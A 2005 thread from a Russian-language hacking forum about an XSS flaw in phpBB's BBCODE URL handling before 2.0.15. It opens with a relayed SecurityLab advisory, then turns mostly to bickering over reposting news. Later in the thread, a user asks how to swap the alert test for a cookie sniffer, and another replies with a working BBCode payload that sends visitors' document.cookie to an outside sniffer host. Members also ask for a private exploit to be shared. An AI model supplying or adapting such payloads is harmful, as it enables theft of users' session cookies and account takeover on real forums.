Форумы phpBB < 2.0.15, BBCODE URL в phpBB

Discussion in 'Уязвимости CMS/форумов' started by karapuz, 6 Jun 2005.

  1. karapuz

    karapuz New Member

    Joined:
    6 Mar 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    http://www.securitylab.ru/55012.html
    http://www.securitylab.ru/55013.html

    Межсайтовый скриптинг в при обработке BBCODE URL в phpBB
    Программа: phpBB версии до 2.0.15

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

    Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

    URL производителя: www.phpbb.com

    Решение: Установите последнюю версию (2.0.15) с сайта производителя.
     
    #1 karapuz, 6 Jun 2005
    Last edited: 6 Jun 2005
  2. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Так-с... любить Секлаба!!
    Уже в 2-х местах оставил ссылки...

    Попрошу больше не писать подобных постов.. Со мной многие согласятся. Нам не нужно тупые копи_пейст новостей секлаба, усёк?
     
  3. karapuz

    karapuz New Member

    Joined:
    6 Mar 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    Rebz, я те че каждый день ссылки кидаю ? и оставил то я их по делу!!!
    вроде как ты и не модератор(админ, урцтой перец :D) что бы права качать.
    а запостил я потому что ни кто эту тему не обсуждал еще! имхо phpBB многих интересует.


    Rebz не надо быть таким "реальным авторитетом форума, подписывающимся за всех"

    p.s. вроде я понятно обьяснил...
     
  4. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    вроде бы понятно..
    но вижу ты новичок и не и знаешь наших "тёплых" отношений к секлабу.
    А про авторитет - это уже не твоё дело =)
     
  5. (-=util=-)

    (-=util=-) Banned

    Joined:
    2 Dec 2004
    Messages:
    337
    Likes Received:
    8
    Reputations:
    2
    сейчас опять обрушится серия ударов по phpBB =)
     
  6. CyberHack

    CyberHack New Member

    Joined:
    20 May 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    vo novoe sobitie.davaite sozdaite vidio kak lamanut forum.
    pojavilsia novij bag zna4it nobvoe vidio popitajtes sozdat.
    ocen bi xotelos posmatret
     
  7. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    кто тебе это сделать мешает?
     
  8. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Нунафига с секлаба то
     
  9. OLIVER

    OLIVER Elder - Старейшина

    Joined:
    5 Feb 2005
    Messages:
    54
    Likes Received:
    2
    Reputations:
    4
    Kez ну так выбора же практически нет... По иностранным народ лазить не любит, а из русских он один из лутших, это не реклама это ведь реальность, согласись.
    Нужно делать конкуренцию!
     
  10. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    чтоб посраться можно создать другой топик =)
    давайте думайте как это использовать =))))))))))))))

    ЗЫ: секурлаб и так читаем... реально.. ссылки сюда можно не выкладывать
     
  11. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Нэ эксплорере ничего не сработало.
     
  12. Pridu_ROCK

    Pridu_ROCK Member

    Joined:
    11 Apr 2005
    Messages:
    15
    Likes Received:
    7
    Reputations:
    0
    Люди Alert проходит слегка вот только до меня не как не доходит как вместо alertА подставиь снифер с передачей кукисов :( Помогите плиз...
     
  13. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    мда... это как?

    зависит от форума.
    как пример:

    HTML:
    [url="site.ru"style="background:url(javascript:document.location=sniffer.ru+document.cookie;"]clik me[/url]
     
    #13 GreenBear, 10 Jun 2005
    Last edited: 10 Jun 2005
  14. dolzi

    dolzi New Member

    Joined:
    18 May 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    phpbb 2.0.15 кстати эксплоитом можно взломать,
    я его своим личным эксплоитом ломал
     
  15. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    О! Напиши пожалуйста эксплоит сюда или в личку, если не жалко.
     
  16. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    шли-шли... выкладывай здесь, блин!) Аттач ещё пока у всех работает))
    И давай ссылку где можно скачать!
     
  17. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Странно но ладно.
    Проверим реацию.
     
  18. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    уверены что это не будет очередным трояном или еще чем то))
     
  19. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Вот я о том же жду как будут крики там приму меры.
     
  20. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    =)) эй там antares ну что послали тебе сплойт?